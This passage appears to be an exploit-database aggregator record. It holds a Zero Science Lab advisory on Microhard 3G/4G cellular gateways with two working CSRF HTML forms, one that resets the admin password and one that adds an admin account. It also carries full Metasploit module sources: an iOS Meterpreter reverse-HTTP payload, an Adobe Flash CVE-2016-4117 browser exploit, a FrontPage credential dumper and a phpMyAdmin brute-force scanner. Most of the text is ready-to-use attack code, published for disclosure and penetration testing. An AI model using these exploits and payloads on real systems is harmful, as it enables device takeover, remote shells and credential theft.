2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The application interface allows users to perform certain actions via HTTP requests\r\nwithout performing any validity checks to verify the requests. This can be exploited to\r\nperform certain actions with administrative privileges if a logged-in user visits a malicious\r\nweb site.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5478\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nCSRF Change Admin password:\r\n---------------------------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-acl.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"pw1\" value=\"nimda\" />\r\n <input type=\"hidden\" name=\"pw2\" value=\"nimda\" />\r\n <input type=\"hidden\" name=\"passwdchange\" value=\" Change Passwd \" />\r\n <input type=\"hidden\" name=\"user_add\" value=\"\" />\r\n <input type=\"hidden\" name=\"password_add\" value=\"\" />\r\n <input type=\"hidden\" name=\"password2_add\" value=\"\" />\r\n <input type=\"hidden\" name=\"Carrier_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_Settings\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_Keepalive\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_TrafficWatchdog\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_DynamicDNS\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_SMSConfig\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_SMS\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_DataUsage\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Comport_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Comport_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Comport_Com0\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Comport_Com1\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_General\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_Rules\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_PortForwarding\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_MACIPList\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_Reset\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_Location\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_Settings\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_Report\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_GpsGate\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_Recorder\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_LoadRecord\" value=\"0\" />\r\n <input type=\"hidden\" name=\"I/O_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"I/O_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"I/O_OUTPUT\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_LAN\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_Routes\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_GRE\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_PIMSM\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_SNMP\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_sdpServer\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_LocalMonitor\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_Port\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_Settings\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_AccessControl\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_Services\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_Maintenance\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_Reboot\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_Discovery\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_NetflowReport\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_NMSSettings\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_EventReport\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_Modbus\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_Websocket\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_SiteSurvey\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_Ping\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_TraceRoute\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_NetworkTraffic\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_Summary\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_GatewayToGateway\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_ClientToGateway\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_VPNClientAccess\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_CertificateManagement\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_CiscoEasyVPNClient\" value=\"0\" />\r\n <input type=\"submit\" value=\"Change\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n \r\nCSRF Add Admin:\r\n---------------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-acl.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"pw1\" value=\"\" />\r\n <input type=\"hidden\" name=\"pw2\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_add\" value=\"testingus\" />\r\n <input type=\"hidden\" name=\"password_add\" value=\"123456\" />\r\n <input type=\"hidden\" name=\"password2_add\" value=\"123456\" />\r\n <input type=\"hidden\" name=\"Carrier_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_Settings\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_Keepalive\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_TrafficWatchdog\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_DynamicDNS\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_SMSConfig\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_SMS\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_DataUsage\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Comport_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Comport_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Comport_Com0\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Comport_Com1\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_General\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_Rules\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_PortForwarding\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_MACIPList\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_Reset\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_Location\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_Settings\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_Report\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_GpsGate\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_Recorder\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_LoadRecord\" value=\"1\" />\r\n <input type=\"hidden\" name=\"I/O_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"I/O_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"I/O_OUTPUT\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_LAN\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_Routes\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_GRE\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_PIMSM\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_SNMP\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_sdpServer\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_LocalMonitor\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_Port\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_Settings\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_AccessControl\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_Services\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_Maintenance\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_Reboot\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_Discovery\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_NetflowReport\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_NMSSettings\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_EventReport\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_Modbus\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_Websocket\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_SiteSurvey\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_Ping\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_TraceRoute\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_NetworkTraffic\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_Summary\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_GatewayToGateway\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_ClientToGateway\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_VPNClientAccess\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_CertificateManagement\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_CiscoEasyVPNClient\" value=\"1\" />\r\n <input type=\"hidden\" name=\"mhadd_user\" value=\"Add User\" />\r\n <input type=\"submit\" value=\"Request\" />\r\n </form>\r\n </body>\r\n</html>\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30736"}], "metasploit": [{"lastseen": "2019-11-30T16:32:12", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2018-10-10T09:36:27", "id": "MSF:PAYLOAD/APPLE_IOS/ARMLE/METERPRETER_REVERSE_HTTP", "href": "", "type": "metasploit", "title": "Apple_iOS Meterpreter, Reverse HTTP Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_http'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_armle_apple_ios'\n\nmodule MetasploitModule\n\n CachedSize = 623228\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apple_iOS Meterpreter, Reverse HTTP Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'apple_ios',\n 'Arch' => ARCH_ARMLE,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttp,\n 'Session' => Msf::Sessions::Meterpreter_armle_Apple_iOS\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'http',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('arm-iphone-darwin', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb"}, {"lastseen": "2019-11-20T02:57:39", "bulletinFamily": "exploit", "description": "This module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.\n", "modified": "2019-02-09T10:46:35", "published": "2018-10-10T09:27:51", "id": "MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP", "href": "", "type": "metasploit", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\n 'Description' => %q(\n This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\n 'bcook-r7' # Imported Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2016-4117'],\n ['BID', '90505'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\n ['URL', 'http://www.securitytracker.com/id/1035826'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['osx'],\n 'BrowserRequirements' =>\n {\n source: /script|headers/i,\n os_name: lambda do |os|\n os =~ OperatingSystems::Match::MAC_OSX\n end,\n ua_name: lambda do |ua|\n case target.name\n when 'Mac OS X'\n return true if ua == Msf::HttpClients::SAFARI\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n flash: lambda do |ver|\n case target.name\n when 'Mac OS X'\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [\n 'Mac OS X', {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 27 2016',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri.end_with? 'swf'\n print_status('Sending SWF...')\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name.include? 'osx'\n platform_id = 'osx'\n end\n html_template = %(<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n )\n\n return html_template, binding\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\n File.binread(path)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb"}, {"lastseen": "2019-12-09T09:09:16", "bulletinFamily": "exploit", "description": "This module downloads and parses the '_vti_pvt/service.pwd', '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage server to find credentials.\n", "modified": "2018-09-21T16:44:10", "published": "2018-08-27T18:20:26", "id": "MSF:AUXILIARY/SCANNER/HTTP/FRONTPAGE_CREDENTIAL_DUMP", "href": "", "type": "metasploit", "title": "FrontPage .pwd File Credential Dump", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'FrontPage .pwd File Credential Dump',\n 'Description' => %q{\n This module downloads and parses the '_vti_pvt/service.pwd',\n '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage\n server to find credentials.\n },\n 'References' =>\n [\n [ 'PACKETSTORM', '11556'],\n [ 'URL', 'https://insecure.org/sploits/Microsoft.frontpage.insecurities.html'],\n [ 'URL', 'http://sparty.secniche.org/' ]\n ],\n 'Author' =>\n [\n 'Aditya K Sood @adityaksood', # Sparty tool'\n 'Stephen Haywood @averagesecguy' # Metasploit module'\n ],\n 'License' => MSF_LICENSE,\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path', '/'])\n ])\n end\n\n\n def get_pass_file(fname)\n uri = normalize_uri(target_uri.path, '_vti_pvt', fname)\n\n vprint_status(\"Requesting: #{uri}\")\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET',\n })\n\n unless res.code == 200\n vprint_status(\"File #{uri} not found.\")\n return nil\n end\n\n vprint_status(\"Found #{uri}.\")\n\n unless res.body.lines.first.chomp == '# -FrontPage-'\n vprint_status(\"File does not contain FrontPage credentials.\")\n vprint_status(res.body)\n return nil\n end\n\n vprint_status(\"Found FrontPage credentials.\")\n return res.body\n end\n\n def run_host(ip)\n files = ['service.pwd', 'administrators.pwd', 'authors.pwd']\n creds = []\n\n files.each do |filename|\n source = filename.chomp('.pwd').capitalize\n contents = get_pass_file(filename)\n\n next if contents.nil?\n\n print_good(\"#{ip} - #{filename}\")\n\n contents.each_line do |line|\n next if line.chomp == '# -FrontPage-'\n user = line.chomp.split(':')[0]\n pass = line.chomp.split(':')[1]\n\n creds << [source, user, pass]\n end\n end\n\n cred_table = Rex::Text::Table.new(\n 'Header' => 'FrontPage Credentials',\n 'Indent' => 1,\n 'Columns' => ['Source', 'Username', 'Password Hash']\n )\n\n creds.each do |c|\n cred_table << c\n end\n\n print_line\n print_line(\"#{cred_table}\")\n\n loot_name = 'frontpage.creds'\n loot_type = 'text/csv'\n loot_filename = 'frontpage_creds.csv'\n loot_desc = 'FrontPage Credentials'\n\n p = store_loot(\n loot_name,\n loot_type,\n rhost,\n cred_table.to_csv,\n loot_filename,\n loot_desc)\n\n print_status \"Credentials saved in: #{p}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/frontpage_credential_dump.rb"}, {"lastseen": "2019-11-25T10:04:13", "bulletinFamily": "exploit", "description": "This module will attempt to authenticate to PhpMyAdmin.\n", "modified": "2019-06-27T22:06:32", "published": "2018-07-24T14:47:01", "id": "MSF:AUXILIARY/SCANNER/HTTP/PHPMYADMIN_LOGIN", "href": "", "type": "metasploit", "title": "PhpMyAdmin Login Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/phpmyadmin'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'PhpMyAdmin Login Scanner',\n 'Description' => %q{\n This module will attempt to authenticate to PhpMyAdmin.\n },\n 'Author' => [ 'Shelby Pace' ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'RPORT' => 80,\n 'USERNAME' => 'root'\n }\n ))\n\n register_options(\n [\n OptString.new('USERNAME', [true, 'The username to PhpMyAdmin', 'root']),\n OptString.new('PASSWORD', [false, 'The password to PhpMyAdmin', '']),\n OptString.new('TARGETURI', [true, 'The path to PhpMyAdmin', '/index.php'])\n ])\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n def scanner(ip)\n @scanner ||= lambda {\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n return Metasploit::Framework::LoginScanner::PhpMyAdmin.new(\n configure_http_login_scanner(\n host: ip,\n port: datastore['RPORT'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n uri: normalize_uri(datastore['TARGETURI']),\n connection_timeout: 5\n ))\n }.call\n end\n\n def report_bad_cred(ip, rport, result)\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n end\n\n def run_host(ip)\n phpmyadmin_res = scanner(ip).check_setup\n unless phpmyadmin_res\n print_brute(:level => :error, :ip => ip, :msg => \"PhpMyAdmin is not available\")\n return\n end\n\n print_status(\"PhpMyAdmin Version: #{phpmyadmin_res}\")\n\n scanner(ip).scan! do |result|\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(:level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\")\n store_valid_credential(\n user: result.credential.public,\n private: result.credential.private,\n private_type: :password,\n proof: result.proof,\n service_data: {\n address: ip,\n port: rport,\n service_name: 'http',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n )\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)\n report_bad_cred(ip, rport, result)\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(:level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\")\n report_bad_cred(ip, rport, result)\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/phpmyadmin_login.rb"}], "zeroscience": [{"lastseen": "2019-11-11T16:11:52", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download \nAdvisory ID: [ZSL-2018-5484](<ZSL-2018-5484.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Privilege Escalation, Exposure of Sensitive Information, DoS, Security Bypass \nRisk: (4/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe system backup configuration file 'IPn4G.config' in '/' directory or its respective name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp' and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain circumstances. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 